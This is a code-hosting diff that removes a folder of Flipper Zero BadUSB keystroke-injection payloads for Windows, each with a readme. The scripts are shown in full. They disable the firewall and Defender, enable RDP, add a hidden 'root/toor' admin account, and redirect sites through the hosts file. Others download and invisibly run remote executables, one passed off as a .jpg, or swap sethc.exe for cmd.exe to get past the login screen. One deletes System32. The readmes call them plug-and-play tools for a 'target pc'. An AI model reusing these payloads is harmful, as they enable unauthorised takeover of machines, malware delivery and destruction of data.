🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    Execution/ActivateRDP/ActivateRDP.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Activates Remote Desktop.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 1200
    16  -ALT y
    17  -DELAY 1200
    18  -GUI UP
    19  -DELAY 1200
    20  -STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0;Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1;netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes;netsh advfirewall firewall set rule group='remote desktop' new enable=Yes; exit
    21  -ENTER
    22  - 
  • ■ ■ ■ ■ ■ ■
    Execution/ActivateRDP/readme.md
    1  -
    2  -# ActivateRDP
    3  -
    4  -This script enables Remote Desktop connections and requires RDP authentication, so it opens the necessary firewall ports to allow incoming connections.
    5  -
    6  -
    7  -
    8  -
    9  -## How to use?
    10  -
    11  -This script is easy to use. Plug the Flipper in and run the script.
    12  -
    13  -
    14  -
    15  -
    16  -## Features
    17  -
    18  -- allows remote connections
    19  -- enables RDP authentication
    20  -- allow incoming remote connections
    21  -
    22  -
    23  -
    24  -
    25  -## Feedback
    26  -
    27  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    28  -
    29  -
    30  -
    31  -
    32  -
    33  -
    34  -## Support
    35  -
    36  -For support, contact me via Discord "UNC0V3R3D#8662".
    37  -
    38  -
    39  -## Meta
    40  -
    41  -
    42  -- If you want to sponsor me on Patreon, the link is on my profile.
    43  -
    44  -
    45  - 
  • ■ ■ ■ ■ ■ ■
    Execution/ChangeWinUsername/ChangeWinUsername.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Changes the Windows 10 username to the name of your choice.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 560
    13  -LEFTARROW
    14  -DELAY 500
    15  -ENTER
    16  -DELAY 700
    17  -STRING $User = ([Environment]::UserName)
    18  -DELAY 300
    19  -ENTER
    20  -DELAY 500
    21  -STRING Rename-LocalUser -Name $User -NewName "New Name"
    22  -DELAY 300
    23  -ENTER
    24  -DELAY 500
    25  -exit
    26  - 
  • ■ ■ ■ ■ ■ ■
    Execution/ChangeWinUsername/readme.md
    1  -
    2  -# ChangeWinUsername
    3  -
    4  -This script simply changes the Windows Username.
    5  -
    6  -
    7  -
    8  -
    9  -## How to use?
    10  -
    11  -This script is not plug and play. You need to replace "New Name" to any name you want right here: "STRING Rename-LocalUser -Name $User -NewName "New Name""
    12  -
    13  -
    14  -
    15  -
    16  -## Features
    17  -
    18  -- open powershell
    19  -- change windows username
    20  -
    21  -
    22  -
    23  -
    24  -## Feedback
    25  -
    26  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    27  -
    28  -
    29  -
    30  -
    31  -
    32  -
    33  -## Support
    34  -
    35  -For support, contact me via Discord "UNC0V3R3D#8662".
    36  -
    37  -
    38  -## Meta
    39  -
    40  -
    41  -- If you want to sponsor me on Patreon, the link is on my profile.
    42  -
    43  -
    44  - 
  • ■ ■ ■ ■ ■ ■
    Execution/Create_New_Windows_Admin/Create_New_Windows_Admin.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Create a new Windows-User with Admin perms.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 560
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 560
    16  -ALT y
    17  -DELAY 300
    18  -STRING Net User root toor /ADD;Net LocalGroup Administrators root /ADD;Net LocalGroup Administrator root /ADD;Net LocalGroup Administratoren root /ADD;reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v root /t REG_DWORD /d 0 /f; exit
    19  -ENTER
  • ■ ■ ■ ■ ■ ■
    Execution/Create_New_Windows_Admin/readme.md
    1  -
    2  -# Create_New_Windows_Admin
    3  -
    4  -This script creates a new windows admin user on the target pc.
    5  -
    6  -
    7  -
    8  -
    9  -## How to use?
    10  -
    11  -This script is plug and play. After the new user is created you need to use the username "root" and the password "toor" to login.
    12  -
    13  -
    14  -
    15  -
    16  -## Features
    17  -
    18  -- open powershell
    19  -- create new admin user
    20  -- create name "root"
    21  -- create password "toor"
    22  -
    23  -
    24  -
    25  -
    26  -## Feedback
    27  -
    28  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    29  -
    30  -
    31  -
    32  -
    33  -
    34  -
    35  -## Support
    36  -
    37  -For support, contact me via Discord "UNC0V3R3D#8662".
    38  -
    39  -
    40  -## Meta
    41  -
    42  -
    43  -- If you want to sponsor me on Patreon, the link is on my profile.
    44  -
    45  -
    46  - 
  • ■ ■ ■ ■ ■ ■
    Execution/DNS_Cache_Poison/DNS_Cache_Poison.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Poisons the DNS Cache. (https://www.cloudflare.com/learning/dns/dns-cache-poisoning/)
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 750
    8  -WINDOWS r
    9  -DELAY 800
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 870
    16  -ALT y
    17  -DELAY 790
    18  -STRING $redirectionAddress="IP ADRESS HERE";$redirectedSite="URL HERE";$hosts1 = $redirectionAddress + ' ' + $redirectedSite + ([Environment]::NewLine);$hosts2 = $redirectionAddress + ' www.' + $redirectedSite;$hoststotal = $hosts1 + $hosts2;[io.file]::writealltext("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS", $hoststotal); exit
    19  -ENTER
  • ■ ■ ■ ■ ■ ■
    Execution/DNS_Cache_Poison/readme.md
    1  -
    2  -# DNS_Cache_Poison
    3  -
    4  -This script modifies the "hosts" file on a Windows operating system. You can change ip adresses of resolved domain names to open facebook.com instead of google.com when you search it for example.
    5  -
    6  -
    7  -
    8  -## How to use?
    9  -
    10  -This script is not plug and play. You will have to do the following changes:
    11  -
    12  -- change rediraction adress "$redirectionAddress="IP ADRESS HERE""
    13  -- change rediraction url "$redirectedSite="URL HERE""
    14  -
    15  -
    16  -
    17  -
    18  -## Features
    19  -
    20  -- open powershell
    21  -- change content of "hosts" file
    22  -
    23  -
    24  -
    25  -
    26  -
    27  -## Feedback
    28  -
    29  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    30  -
    31  -
    32  -
    33  -
    34  -
    35  -
    36  -## Support
    37  -
    38  -For support, contact me via Discord "UNC0V3R3D#8662".
    39  -
    40  -
    41  -## Meta
    42  -
    43  -
    44  -- If you want to sponsor me on Patreon, the link is on my profile.
    45  -
    46  -
    47  - 
  • ■ ■ ■ ■ ■ ■
    Execution/Delete_System_32/Delete_System_32.txt
    1  -REM Author: FalsePhilosopher
    2  -REM Description: Deletes System 32...
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -GUI r
    7  -DELAY 600
    8  -STRING cmd
    9  -CTRL-SHIFT ENTER
    10  -DELAY 1500
    11  -ALT y
    12  -DELAY 800
    13  -STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q *
    14  -ENTER
    15  - 
  • ■ ■ ■ ■ ■ ■
    Execution/Delete_System_32/readme.md
    1  -
    2  -# Delete_System_32
    3  -
    4  -This script deletes the system 32 folder. Be careful!
    5  -
    6  -
    7  -
    8  -
    9  -## How to use?
    10  -
    11  -This script is plug and play. I am not responsible for any damage.
    12  -
    13  -
    14  -
    15  -
    16  -## Features
    17  -
    18  -- open powershell
    19  -- delete system 32
    20  -
    21  -
    22  -
    23  -
    24  -
    25  -## Feedback
    26  -
    27  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    28  -
    29  -
    30  -
    31  -
    32  -
    33  -
    34  -## Support
    35  -
    36  -For support, contact me via Discord "UNC0V3R3D#8662".
    37  -
    38  -
    39  -## Meta
    40  -
    41  -
    42  -- If you want to sponsor me on Patreon, the link is on my profile.
    43  -
    44  -
    45  - 
  • ■ ■ ■ ■ ■ ■
    Execution/DisableFirewall/DisableFirewall.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Disables the Windows-Firewall.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 850
    8  -WINDOWS r
    9  -DELAY 900
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 900
    16  -ALT y
    17  -DELAY 900
    18  -STRING netsh advfirewall set allprofiles state off; exit
    19  -ENTER
  • ■ ■ ■ ■ ■ ■
    Execution/DisableFirewall/readme.md
    1  -
    2  -# DisableFirewall
    3  -
    4  -This script disables the windows firewall.
    5  -
    6  -
    7  -
    8  -## How to use?
    9  -
    10  -This script is plug and play. Just plug the Flipper in and run the script.
    11  -
    12  -
    13  -
    14  -
    15  -## Features
    16  -
    17  -- open powershell
    18  -- disable windows firewall
    19  -
    20  -
    21  -
    22  -
    23  -
    24  -## Feedback
    25  -
    26  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    27  -
    28  -
    29  -
    30  -
    31  -
    32  -
    33  -## Support
    34  -
    35  -For support, contact me via Discord "UNC0V3R3D#8662".
    36  -
    37  -
    38  -## Meta
    39  -
    40  -
    41  -- If you want to sponsor me on Patreon, the link is on my profile.
    42  -
    43  -
    44  - 
  • ■ ■ ■ ■ ■ ■
    Execution/Disable_WinDefender/Disable_WinDefender.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Disables Windows Defender.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 1500
    6  -CTRL ESC
    7  -DELAY 750
    8  -STRING windows security
    9  -DELAY 250
    10  -ENTER
    11  -DELAY 1000
    12  -ENTER
    13  -DELAY 500
    14  -TAB
    15  -DELAY 100
    16  -TAB
    17  -DELAY 100
    18  -TAB
    19  -DELAY 100
    20  -TAB
    21  -DELAY 100
    22  -ENTER
    23  -DELAY 500
    24  -SPACE
    25  -DELAY 1000
    26  -ALT y
    27  -DELAY 1000
    28  -ALT F4
    29  -DELAY 500
    30  -GUI r
    31  -DELAY 500
    32  -STRING powershell
    33  -CTRL-SHIFT ENTER
    34  -DELAY 1000
    35  -ALT y
    36  -DELAY 1000
    37  -STRING Add-MpPreference -ExclusionPath “C:”
    38  -ENTER
    39  -DELAY 2000
    40  -STRING EXIT
    41  -ENTER
    42  - 
  • ■ ■ ■ ■ ■ ■
    Execution/Disable_WinDefender/readme.md
    1  -
    2  -# Disable_WinDefender
    3  -
    4  -This script disables the windows defender until the pc is restarted.
    5  -
    6  -
    7  -
    8  -## How to use?
    9  -
    10  -This script is plug and play.
    11  -
    12  -
    13  -
    14  -
    15  -## Features
    16  -
    17  -- open powershell
    18  -- disable windows defender
    19  -
    20  -
    21  -
    22  -
    23  -
    24  -## Feedback
    25  -
    26  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    27  -
    28  -
    29  -
    30  -
    31  -
    32  -
    33  -## Support
    34  -
    35  -For support, contact me via Discord "UNC0V3R3D#8662".
    36  -
    37  -
    38  -## Meta
    39  -
    40  -
    41  -- If you want to sponsor me on Patreon, the link is on my profile.
    42  -
    43  -
    44  - 
  • ■ ■ ■ ■ ■ ■
    Execution/DownloadAnyEXE/DownloadAnyEXE.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Downloads an .exe file from the URL and runs it on the target pc.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 950
    8  -WINDOWS r
    9  -DELAY 650
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 850
    16  -ALT y
    17  -DELAY 1200
    18  -STRING $url = "URL TO EXE"; $output = "C:\windows\41281687.exe"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath "C:\windows\41281687.exe"; exit
    19  -ENTER
  • ■ ■ ■ ■ ■ ■
    Execution/DownloadAnyEXE/readme.md
    1  -
    2  -# DownloadAnyEXE
    3  -
    4  -This script downloads an exe from an url that you will have to provide, then it executes the exe file.
    5  -
    6  -
    7  -
    8  -## How to use?
    9  -
    10  -This script is not plug and play. You will have to do the following changes:
    11  -
    12  -- change url for the .exe file "$url = "URL TO EXE""
    13  -
    14  -
    15  -
    16  -## Features
    17  -
    18  -- open powershell
    19  -- download .exe from url
    20  -- execute downloaded .exe
    21  -
    22  -
    23  -
    24  -
    25  -
    26  -## Feedback
    27  -
    28  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    29  -
    30  -
    31  -
    32  -
    33  -
    34  -
    35  -## Support
    36  -
    37  -For support, contact me via Discord "UNC0V3R3D#8662".
    38  -
    39  -
    40  -## Meta
    41  -
    42  -
    43  -- If you want to sponsor me on Patreon, the link is on my profile.
    44  -
    45  -
    46  - 
  • ■ ■ ■ ■ ■ ■
    Execution/Invisible_DownExec/Invisible_DownExec.txt
    1  -REM Author: hell0
    2  -REM Description: Downloads an .exe file from the URL and runs it on the target pc.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -REM Target: All Windows
    6  -DELAY 500
    7  -GUI d
    8  -DELAY 500
    9  -GUI r
    10  -DELAY 500
    11  -STRING powershell.exe
    12  -ENTER
    13  -DELAY 2000
    14  -STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://yoursite.com/your_executable.exe' -OutFile 'your_executable.exe'; Start-Process -FilePath '.\your_executable.exe'; exit" -WindowStyle Hidden; exit
    15  -ENTER
    16  -DELAY 500
    17  -GUI d
    18  - 
  • ■ ■ ■ ■ ■ ■
    Execution/Invisible_DownExec/readme.md
    1  -
    2  -# Invisible_DownExec
    3  -
    4  -This script invisibly downloads an exe from an url that you will have to provide, then it executes the exe file.
    5  -
    6  -
    7  -
    8  -## How to use?
    9  -
    10  -This script is not plug and play. You will have to do the following changes:
    11  -
    12  -- change url for the .exe file "-Uri 'https://yoursite.com/your_executable.exe'"
    13  -- change name of the .exe file "-OutFile 'your_executable.exe'"
    14  -
    15  -
    16  -## Features
    17  -
    18  -- open powershell invisble
    19  -- download .exe from url
    20  -- execute downloaded .exe
    21  -
    22  -
    23  -
    24  -
    25  -
    26  -## Feedback
    27  -
    28  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    29  -
    30  -
    31  -
    32  -
    33  -
    34  -
    35  -## Support
    36  -
    37  -For support, contact me via Discord "UNC0V3R3D#8662".
    38  -
    39  -
    40  -## Meta
    41  -
    42  -
    43  -- If you want to sponsor me on Patreon, the link is on my profile.
    44  -
    45  -
    46  - 
  • ■ ■ ■ ■ ■ ■
    Execution/Invisible_DownExec_Zip_Extract/Invisible_DownExec_Zip_Extract.txt
    1  -REM Author: hell0
    2  -REM Description: Downloads an .zip file from the URL, extract and runs it on the target pc.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -REM Target: All Windows
    6  -DELAY 500
    7  -GUI d
    8  -DELAY 500
    9  -GUI r
    10  -DELAY 500
    11  -STRING powershell.exe
    12  -ENTER
    13  -DELAY 2000
    14  -STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://yoursite.com/zipfile.jpg' -OutFile 'zipfile.zip'; Expand-Archive zipfile.zip; Start-Process -FilePath '.\zipfile\your_executable.exe'; exit" -WindowStyle Hidden; exit
    15  -ENTER
    16  -DELAY 500
    17  -GUI d
    18  - 
  • ■ ■ ■ ■ ■ ■
    Execution/Invisible_DownExec_Zip_Extract/readme.md
    1  -
    2  -# Invisible_DownExec_Zip_Extract
    3  -
    4  -This script invisibly downloads an .zip file from the URL, extracts and runs it on the target pc.
    5  -
    6  -
    7  -
    8  -## How to use?
    9  -
    10  -This script is not plug and play. You will have to do the following changes:
    11  -
    12  -- change url for the .zip file "-Uri 'https://yoursite.com/zipfile.jpg'"
    13  -- change name of the .zip file "-OutFile 'zipfile.zip'"
    14  -- change path of the .exe in the extracted folder "-FilePath '.\zipfile\your_executable.exe'"
    15  -
    16  -
    17  -## Features
    18  -
    19  -- open powershell invisble
    20  -- download .zip from url
    21  -- extract .zip file
    22  -- run exe from .zip file
    23  -
    24  -
    25  -
    26  -
    27  -
    28  -## Feedback
    29  -
    30  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    31  -
    32  -
    33  -
    34  -
    35  -
    36  -
    37  -## Support
    38  -
    39  -For support, contact me via Discord "UNC0V3R3D#8662".
    40  -
    41  -
    42  -## Meta
    43  -
    44  -
    45  -- If you want to sponsor me on Patreon, the link is on my profile.
    46  -
    47  -
    48  - 
  • ■ ■ ■ ■ ■ ■
    Execution/OpenAnyPort/OpenAnyPort.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Open any TCP or UDP Port on the target PC.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 850
    8  -WINDOWS r
    9  -DELAY 850
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 800
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 900
    16  -ALT y
    17  -DELAY 900
    18  -STRING netsh advfirewall firewall add rule name=Firewall entry name dir=in action=allow protocol=TCP or UDP localport=Port Number; exit
    19  -ENTER
  • ■ ■ ■ ■ ■ ■
    Execution/OpenAnyPort/readme.md
    1  -
    2  -# OpenAnyPort
    3  -
    4  -This script adds a firewall rule to the Windows Advanced Firewall that allows incoming traffic over TCP or UDP on a specific port number.
    5  -
    6  -
    7  -
    8  -## How to use?
    9  -
    10  -This script is not plug and play. You will have to do the following changes:
    11  -
    12  -- choose protocol "protocol=TCP or UDP"
    13  -- change localport "localport=Port Number"
    14  -- choose entry name "name=Firewall entry name"
    15  -
    16  -
    17  -## Features
    18  -
    19  -- open powershell
    20  -- create new entry
    21  -- allow port to receive traffic
    22  -
    23  -
    24  -
    25  -
    26  -
    27  -## Feedback
    28  -
    29  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    30  -
    31  -
    32  -
    33  -
    34  -
    35  -
    36  -## Support
    37  -
    38  -For support, contact me via Discord "UNC0V3R3D#8662".
    39  -
    40  -
    41  -## Meta
    42  -
    43  -
    44  -- If you want to sponsor me on Patreon, the link is on my profile.
    45  -
    46  -
    47  - 
  • ■ ■ ■ ■ ■ ■
    Execution/RemoveWindowsUpdate/RemoveWindowsUpdate.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Remove any Windows Update. Please put in the update number you want to remove. Example: KB27475
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 1500
    16  -ALT y
    17  -DELAY 1500
    18  -GUI UP
    19  -DELAY 1500
    20  -STRING $input="UPDATE NUMBER";$input = $input.Replace('KB', '');$cmdString = 'wusa /quiet /norestart /uninstall /kb:' + $input;Invoke-Expression -Command $cmdString; exit
    21  -ENTER
    22  - 
  • ■ ■ ■ ■ ■ ■
    Execution/RemoveWindowsUpdate/readme.md
    1  -
    2  -# RemoveWindowsUpdate
    3  -
    4  -This script uninstalls a Windows update that has been previously installed on the system.
    5  -
    6  -
    7  -
    8  -## How to use?
    9  -
    10  -This script is not plug and play. You will have to do the following changes:
    11  -
    12  -- change update number "$input="UPDATE NUMBER""
    13  -
    14  -
    15  -## Features
    16  -
    17  -- open powershell
    18  -- find update by number
    19  -- uninstall update
    20  -
    21  -
    22  -
    23  -
    24  -
    25  -## Feedback
    26  -
    27  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    28  -
    29  -
    30  -
    31  -
    32  -
    33  -
    34  -## Support
    35  -
    36  -For support, contact me via Discord "UNC0V3R3D#8662".
    37  -
    38  -
    39  -## Meta
    40  -
    41  -
    42  -- If you want to sponsor me on Patreon, the link is on my profile.
    43  -
    44  -
    45  - 
  • ■ ■ ■ ■ ■ ■
    Execution/StartWifiAccessPoint/StartWifiAccessPoint.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Connect to a Wifi (example Evil Twin) to sniff packets or what you wanna do.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 1200
    16  -ALT y
    17  -DELAY 1200
    18  -GUI UP
    19  -DELAY 1200
    20  -STRING netsh wlan set hostednetwork ssid=WLAN NAME key=PASSWORD;netsh wlan start hostednetwork; exit
    21  -ENTER
    22  - 
  • ■ ■ ■ ■ ■ ■
    Execution/StartWifiAccessPoint/readme.md
    1  -
    2  -# StartWifiAccessPoint
    3  -
    4  -This script sets up a hosted wireless network on a computer running Windows.
    5  -
    6  -
    7  -## How to use?
    8  -
    9  -This script is not plug and play. You will have to do the following changes:
    10  -
    11  -- choose name of wifi "ssid=WLAN NAME"
    12  -- choose password of the wifi "key=PASSWORD"
    13  -
    14  -
    15  -## Features
    16  -
    17  -- open powershell
    18  -- create new wifi by ssid
    19  -- set password for wifi
    20  -
    21  -
    22  -
    23  -
    24  -
    25  -## Feedback
    26  -
    27  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    28  -
    29  -
    30  -
    31  -
    32  -
    33  -
    34  -## Support
    35  -
    36  -For support, contact me via Discord "UNC0V3R3D#8662".
    37  -
    38  -
    39  -## Meta
    40  -
    41  -
    42  -- If you want to sponsor me on Patreon, the link is on my profile.
    43  -
    44  -
    45  - 
  • ■ ■ ■ ■ ■ ■
    Execution/StickyKeysSWAP/StickyKeysSWAP.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Switch cmd.exe with sethc.exe, allowing to get access to target pc without knowing the pin.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 1500
    16  -ALT y
    17  -DELAY 1500
    18  -GUI UP
    19  -DELAY 1500
    20  -STRING copy c:\windows\system32\sethc.exe c:\;$acl = Get-Acl c:\windows\system32\sethc.exe;$AccessRule1 = New-Object System.Security.AccessControl.FileSystemAccessRule("Jeder","FullControl","Allow");$AccessRule2 = New-Object System.Security.AccessControl.FileSystemAccessRule("Everyone","FullControl","Allow");$acl.SetAccessRule($AccessRule1);$acl | Set-Acl c:\windows\system32\sethc.exe;$acl.SetAccessRule($AccessRule2);$acl | Set-Acl c:\windows\system32\sethc.exe;Copy-Item -Path c:\windows\system32\cmd.exe -Destination c:\windows\system32\sethc.exe -Recurse -force; exit
    21  -ENTER
    22  - 
  • ■ ■ ■ ■ ■ ■
    Execution/StickyKeysSWAP/readme.md
    1  -
    2  -# StickyKeysSWAP
    3  -
    4  -This script modifies the system file "sethc.exe" on a computer running Windows by adding full control access rules for "Everyone", replacing the file with the "cmd.exe" file, and setting the access control list of the file to the modified access control list.
    5  -
    6  -## How to use?
    7  -
    8  -This script is plug and play. Just plug in the Flipper and run the script.
    9  -
    10  -
    11  -## Features
    12  -
    13  -- open powershell
    14  -- replace cmd.exe
    15  -
    16  -
    17  -
    18  -## Feedback
    19  -
    20  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    21  -
    22  -
    23  -
    24  -
    25  -
    26  -
    27  -## Support
    28  -
    29  -For support, contact me via Discord "UNC0V3R3D#8662".
    30  -
    31  -
    32  -## Meta
    33  -
    34  -
    35  -- If you want to sponsor me on Patreon, the link is on my profile.
    36  -
    37  -
    38  - 
  • ■ ■ ■ ■ ■ ■
    Execution/setWinPass/readme.md
    1  -
    2  -# setWinPass
    3  -
    4  -This script sets the password for the current user on windows.
    5  -
    6  -
    7  -## How to use?
    8  -
    9  -This script is not plug and play. You will have to do the following changes:
    10  -
    11  -- change password to anything you like "$NewPassword = ConvertTo-SecureString "PASSWORD HERE""
    12  -
    13  -
    14  -## Features
    15  -
    16  -- open powershell
    17  -- find current username
    18  -- set new password for current user
    19  -
    20  -
    21  -
    22  -
    23  -
    24  -## Feedback
    25  -
    26  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    27  -
    28  -
    29  -
    30  -
    31  -
    32  -
    33  -## Support
    34  -
    35  -For support, contact me via Discord "UNC0V3R3D#8662".
    36  -
    37  -
    38  -## Meta
    39  -
    40  -
    41  -- If you want to sponsor me on Patreon, the link is on my profile.
    42  -
    43  -
    44  - 
  • ■ ■ ■ ■ ■ ■
    Execution/setWinPass/setWinPass.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Change Widnows 10 user password.
    3  -REM Version: 1.0
    4  -REM Category: Execution
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 560
    13  -LEFTARROW
    14  -DELAY 500
    15  -ENTER
    16  -DELAY 560
    17  -STRING $User = ([Environment]::UserName)
    18  -DELAY 200
    19  -ENTER
    20  -DELAY 500
    21  -STRING $NewPassword = ConvertTo-SecureString "PASSWORD HERE" -AsPlainText -Force
    22  -DELAY 300
    23  -ENTER
    24  -DELAY 500
    25  -STRING Set-LocalUser -Name $User -Password $NewPassword
    26  -DELAY 300
    27  -ENTER
    28  -DELAY 600
    29  -exit
    30  - 
Please wait...
Page is in error, reload to recover